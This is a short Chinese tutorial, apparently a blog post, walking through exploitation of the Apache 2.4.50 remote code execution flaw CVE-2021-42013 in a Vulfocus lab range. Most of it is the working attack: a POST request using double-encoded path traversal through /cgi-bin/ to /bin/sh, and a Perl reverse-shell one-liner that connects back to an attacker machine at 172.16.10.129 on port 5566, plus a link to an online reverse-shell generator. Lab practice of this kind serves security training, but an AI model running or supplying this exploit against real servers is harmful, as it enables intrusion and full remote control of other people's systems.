中间件安全: Apache 远程代码执行 (CVE-2021-42013)
靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客
第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )
第二步:进行访问,然后使用 Burp 进行抓包,把我们构成的数据替换进入.
第三步:攻击机进行监听,然后再去 Burp 点击发送。就可以看见返回成功,成功入侵.





- # 访问这个地址就会触发下面的反弹代码.
-
- POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
- #反弹 shell 命令.
-
- echo;perl -e 'use Socket;$i="172.16.10.129";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
-
-
- # 172.16.10.129 是我们(攻击机)的IP地址.
- # 5566 是我们监听的端口.
-
- # 这里添加一个在线反弹 Shell 命令一键生成链接.(这个有很多资料.)
-
- https://forum.ywhack.com/shell.php

